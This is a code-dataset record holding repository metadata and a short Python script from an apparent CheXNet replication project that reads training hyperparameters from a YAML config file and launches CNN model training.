kkuznetsova@sdvor.com
|
b46a348a205b103ffdf185f972fae6009c40452b
|
bce0430f28b303e82102b3ed0040b6c0a39a5d25
|
/retrain.py
|
e017417ed8a0bc916faff58215df0efc14003130
|
[] |
no_license
|
riteshkumarumassedu/chexnet_Replication
|
8a625af925e72aa9063e363e7b47ac9177c4592b
|
2a55f2bab74fb88371f0cea81c50fda17cc0805f
|
refs/heads/master
| 2020-05-20T14:14:04.454362
| 2019-11-04T20:00:18
| 2019-11-04T20:00:18
| 185,617,501
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 851
|
py
|
import yaml
import model as cnn_model
#reading the model parameters from the yaml config file
config_dict = yaml.load(open('config.yaml'))
# name of the CNN model to be run
model = config_dict['model']
pretrained = config_dict['pretrained']
finetuning = config_dict['fine_tuning']
batch_size = config_dict['batch_size']
weight_decay = config_dict['weight_decay']
learning_rate = config_dict['learning_rate']
optmizer = config_dict['optimizer']
tune_epochs = config_dict['tune_epochs']
train_epochs = config_dict['train_epochs']
images_dir = config_dict['images_dir']
labels_dir = config_dict['labels_dir']
# pritning config details for logging purpose
print(config_dict)
# call the method to start training
# path to images # learning rate # weight_decay
cnn_model.train_model_handler(images_dir, learning_rate, weight_decay, config_dict)
|
[
"ritesh_kumar@live.com"
] |
ritesh_kumar@live.com
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.